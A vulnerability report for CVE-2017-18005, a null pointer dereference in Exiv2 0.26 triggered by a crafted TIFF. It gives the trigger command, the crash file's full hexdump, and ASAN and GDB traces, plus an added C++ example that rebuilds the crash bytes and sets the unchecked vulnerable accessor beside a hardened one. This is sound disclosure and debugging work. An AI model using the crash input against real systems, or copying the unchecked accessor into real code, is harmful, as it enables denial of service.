CVE-2017-18005: NULL Pointer Dereference while extracting metadata of a malformed tiff · Issue #168 · Exiv2/exiv2
Exiv2 0.26 has a Null Pointer Dereference in the Exiv2::DataValue::toLong function in value.cpp, related to crafted metadata in a TIFF file.
There’s a NULL Pointer Dereference occurring during the metadata extraction from a malformed tiff file.
This can be triggered by running ./exiv2 -v pr -P EIXxgklnycsvth %file% on the test-case, exiv2-nullpointerderef.zip.
The hexdump of the test-case is:
0000000 4949 002a 0050 0000 3030 3030 3030 3030
0000010 3030 3030 3030 3030 3030 3030 3030 3030
*
0000050 000f 0117 0006 0030 0000 3030 3030 3030
0000060 0003 0030 0000 3030 3030 3030 0002 0030
0000070 0000 3030 3030 3030 000b 0030 0000 3030
0000080 3030 3030 000b 0030 0000 3030 3030 3030
0000090 000b 0030 0000 3030 3030 3030 000b 0030
00000a0 0000 3030 3030 3030 0003 0030 0000 3030
00000b0 3030 3030 000b 0030 0000 3030 3030 3030
00000c0 000b 0030 0000 3030 3030 3030 000a 0000
00000d0 0000 3030 3030 3030 000b 0030 0000 3030
00000e0 3030 3030 000b 0030 0000 3030 3030 3030
00000f0 0003 0030 0000 3030 3030 3030 000c 0000
0000100 0000 3030 3030 0000 0000
0000109
The relevant ASAN output is:
==4728==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x557dc0c47468 bp 0x7fff7558bbb0 sp 0x7fff7558bbb0 T0)
==4728==The signal is caused by a READ memory access.
==4728==Hint: address points to the zero page.
#0 0x557dc0c47467 in Exiv2::DataValue::toLong(long) const /home/ksg/exiv2/src/value.cpp:250
#1 0x557dc0688058 in Action::Print::printMetadatum(Exiv2::Metadatum const&, Exiv2::Image const*) /home/ksg/exiv2/src/actions.cpp:731
#2 0x557dc068bad2 in Action::Print::printMetadata(Exiv2::Image const*) /home/ksg/exiv2/src/actions.cpp:552
#3 0x557dc068d61a in Action::Print::printList() /home/ksg/exiv2/src/actions.cpp:541
#4 0x557dc06b8fff in Action::Print::run(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /home/ksg/exiv2/src/actions.cpp:245
#5 0x557dc05983a6 in main /home/ksg/exiv2/src/exiv2.cpp:170
#6 0x7f2987d301c0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x211c0)
#7 0x557dc0621b59 in _start (/home/ksg/testbench/exiv2_asan+0x22bb59)
It looks like the NULL pointer dereference is being triggered by a 0 value being used as n in the toLong function, which is then dereferenced in
return value_[n];
This is indicated by the GDB backtrace:
Program received signal SIGSEGV, Segmentation fault.
Exiv2::DataValue::toLong (this=0x55555609d860, n=0) at value.cpp:250
250 return value_[n];
(gdb) bt
#0 Exiv2::DataValue::toLong (this=0x55555609d860, n=0) at value.cpp:250
#1 0x000055555561d5f1 in Action::Print::printMetadatum (this=this@entry=0x555556092e70, md=..., pImage=pImage@entry=0x555556093530) at actions.cpp:731
#2 0x000055555561ecf0 in Action::Print::printMetadata (this=this@entry=0x555556092e70, image=image@entry=0x555556093530) at actions.cpp:552
#3 0x000055555561f2fb in Action::Print::printList (this=this@entry=0x555556092e70) at actions.cpp:541
#4 0x00005555556313c8 in Action::Print::run (this=0x555556092e70, path="/home/ksg/exif-crashes/npd") at actions.cpp:245
#5 0x00005555555bc339 in main (argc=<optimized out>, argv=<optimized out>) at exiv2.cpp:170
Debug info:
Exiv2 version 0.26 001a00 (64 bit build)
Compiler: gcc 7.2, clang 4.0.1-6
OS: Ubuntu 17.10
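The crash path described in this report, as an added example that is not Exiv2's code or the reporter's: a minimal walker for the first IFD of the test-case above (its bytes reconstructed from the hexdump, with the "*" row taken as the 0x10 row repeated through 0x4f), which classifies each entry's data as inline, empty, or lying outside the file. Beside it sit two value objects: UncheckedDataValue copies the accessor shape from the backtrace (value_[n] with no bounds check, assuming value_ is a vector whose data pointer is null when empty, consistent with the zero-page read in the ASAN output), and CheckedDataValue is this example's own hardening with an ok_ flag, not the project's patch. Type sizes, names and the summarize helper are this example's assumptions.

```cpp
// Added example (not Exiv2 code): walk IFD0 of the crash file from this report
// and show the unchecked accessor shape from the backtrace next to a checked one.
#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <iterator>
#include <optional>
#include <vector>

using byte = std::uint8_t;

// Test-case bytes reconstructed from the hexdump above: the "*" row means offsets
// 0x10-0x4f repeat the 0x10 row (all 0x30); the file is 0x109 = 265 bytes long.
std::vector<byte> crashFile() {
    std::vector<byte> f = {0x49, 0x49, 0x2a, 0x00, 0x50, 0x00, 0x00, 0x00};
    f.resize(0x50, 0x30);
    static const byte ifd[] = {
        0x0f,0x00,0x17,0x01,0x06,0x00,0x30,0x00,0x00,0x00,0x30,0x30,0x30,0x30,0x30,0x30, // 0x50
        0x03,0x00,0x30,0x00,0x00,0x00,0x30,0x30,0x30,0x30,0x30,0x30,0x02,0x00,0x30,0x00, // 0x60
        0x00,0x00,0x30,0x30,0x30,0x30,0x30,0x30,0x0b,0x00,0x30,0x00,0x00,0x00,0x30,0x30, // 0x70
        0x30,0x30,0x30,0x30,0x0b,0x00,0x30,0x00,0x00,0x00,0x30,0x30,0x30,0x30,0x30,0x30, // 0x80
        0x0b,0x00,0x30,0x00,0x00,0x00,0x30,0x30,0x30,0x30,0x30,0x30,0x0b,0x00,0x30,0x00, // 0x90
        0x00,0x00,0x30,0x30,0x30,0x30,0x30,0x30,0x03,0x00,0x30,0x00,0x00,0x00,0x30,0x30, // 0xa0
        0x30,0x30,0x30,0x30,0x0b,0x00,0x30,0x00,0x00,0x00,0x30,0x30,0x30,0x30,0x30,0x30, // 0xb0
        0x0b,0x00,0x30,0x00,0x00,0x00,0x30,0x30,0x30,0x30,0x30,0x30,0x0a,0x00,0x00,0x00, // 0xc0
        0x00,0x00,0x30,0x30,0x30,0x30,0x30,0x30,0x0b,0x00,0x30,0x00,0x00,0x00,0x30,0x30, // 0xd0
        0x30,0x30,0x30,0x30,0x0b,0x00,0x30,0x00,0x00,0x00,0x30,0x30,0x30,0x30,0x30,0x30, // 0xe0
        0x03,0x00,0x30,0x00,0x00,0x00,0x30,0x30,0x30,0x30,0x30,0x30,0x0c,0x00,0x00,0x00, // 0xf0
        0x00,0x00,0x30,0x30,0x30,0x30,0x00,0x00,0x00                                     // 0x100
    };
    f.insert(f.end(), std::begin(ifd), std::end(ifd));
    return f;
}

struct IfdEntry {
    std::uint16_t tag, type;
    std::uint32_t count, valueOrOffset;
    std::uint64_t byteSize;   // count * sizeof(type); 0 for count 0 or an unknown type
    std::size_t dataOffset;   // inline value field (size <= 4) or valueOrOffset
    bool empty;               // nothing to read, so a value_ built from it stays empty
    bool outOfFile;           // data lies past the end of the file
};
struct Ifd { std::vector<IfdEntry> entries; bool nextPointerTruncated; };

// TIFF types 1..12: BYTE ASCII SHORT LONG RATIONAL SBYTE UNDEFINED SSHORT SLONG SRATIONAL FLOAT DOUBLE
std::size_t typeSize(std::uint16_t type) {
    static const std::size_t sizes[] = {0, 1, 1, 2, 4, 8, 1, 1, 2, 4, 8, 4, 8};
    return type < 13 ? sizes[type] : 0;
}
std::uint16_t rd16(const std::vector<byte>& f, std::size_t o) { return std::uint16_t(f[o] | (f[o + 1] << 8)); }
std::uint32_t rd32(const std::vector<byte>& f, std::size_t o) { return rd16(f, o) | (std::uint32_t(rd16(f, o + 2)) << 16); }

// Little-endian ("II") TIFF only. nullopt if the header or the entry table does not
// fit in the file; a cut-off next-IFD pointer is reported rather than treated as fatal.
std::optional<Ifd> walkIfd0(const std::vector<byte>& f) {
    if (f.size() < 8 || f[0] != 'I' || f[1] != 'I' || rd16(f, 2) != 42) return std::nullopt;
    const std::uint64_t ifd = rd32(f, 4);
    if (ifd + 2 > f.size()) return std::nullopt;
    const std::uint16_t n = rd16(f, std::size_t(ifd));
    const std::uint64_t tableEnd = ifd + 2 + 12ull * n;
    if (tableEnd > f.size()) return std::nullopt;
    Ifd out{{}, tableEnd + 4 > f.size()};
    for (std::uint16_t i = 0; i < n; ++i) {
        const std::size_t o = std::size_t(ifd) + 2 + 12u * i;
        IfdEntry e{rd16(f, o), rd16(f, o + 2), rd32(f, o + 4), rd32(f, o + 8), 0, 0, false, false};
        e.byteSize = std::uint64_t(e.count) * typeSize(e.type);
        e.empty = e.byteSize == 0;
        e.dataOffset = e.byteSize <= 4 ? o + 8 : std::size_t(e.valueOrOffset);
        // 64-bit arithmetic so offset + size cannot wrap around the file-size check.
        e.outOfFile = e.byteSize > 4 && e.valueOrOffset + e.byteSize > f.size();
        out.entries.push_back(e);
    }
    return out;
}

// Bytes a lenient reader hands to the value object: the data when it is in the file,
// otherwise nothing at all (the state the crash needs).
std::vector<byte> readValue(const std::vector<byte>& f, const IfdEntry& e) {
    if (e.empty || e.outOfFile) return {};
    const auto first = f.begin() + static_cast<std::ptrdiff_t>(e.dataOffset);
    return std::vector<byte>(first, first + static_cast<std::ptrdiff_t>(e.byteSize));
}

// The accessor shape from the backtrace: value_[n] with no bounds check. On an empty
// vector this reads through a null data pointer, the zero-page read in the ASAN
// output. Never call it with n >= value_.size().
struct UncheckedDataValue {
    std::vector<byte> value_;
    long toLong(long n = 0) const { return value_[std::size_t(n)]; }
};

// This example's own hardening, not the project's patch: out-of-range n returns 0
// and clears ok_ so the caller can tell a missing value from a real 0.
struct CheckedDataValue {
    std::vector<byte> value_;
    mutable bool ok_ = true;
    long toLong(long n = 0) const {
        ok_ = n >= 0 && std::size_t(n) < value_.size();
        return ok_ ? value_[std::size_t(n)] : 0;
    }
};

struct Summary { int outOfFile = 0, empty = 0, safeToLong = 0; };

// How many entries of the file survive toLong(0) through the checked accessor.
Summary summarize(const std::vector<byte>& f) {
    Summary s;
    const auto ifd = walkIfd0(f);
    if (!ifd) return s;
    for (const IfdEntry& e : ifd->entries) {
        s.outOfFile += e.outOfFile;
        s.empty += e.empty;
        CheckedDataValue v{readValue(f, e)};
        v.toLong(0);
        s.safeToLong += v.ok_;
    }
    return s;
}

int main() {
    const Summary s = summarize(crashFile());
    std::printf("data outside file: %d, empty values: %d, safe toLong(0): %d\n",
                s.outOfFile, s.empty, s.safeToLong);
    return 0;
}
```

Run as-is, the walker finds 15 entries, 13 of them pointing 48 elements at offset 0x30303030 (far past the 265-byte file) and 2 with a count of 0, so every value handed to the accessor is empty and only the checked toLong returns without touching memory; the next-IFD pointer is also cut off by one byte. The point for a reader of the crash is that the null address comes from the empty value's data pointer, so the fix belongs in the accessor (or in refusing to build a value from unreadable data), not in the caller that passed n = 0.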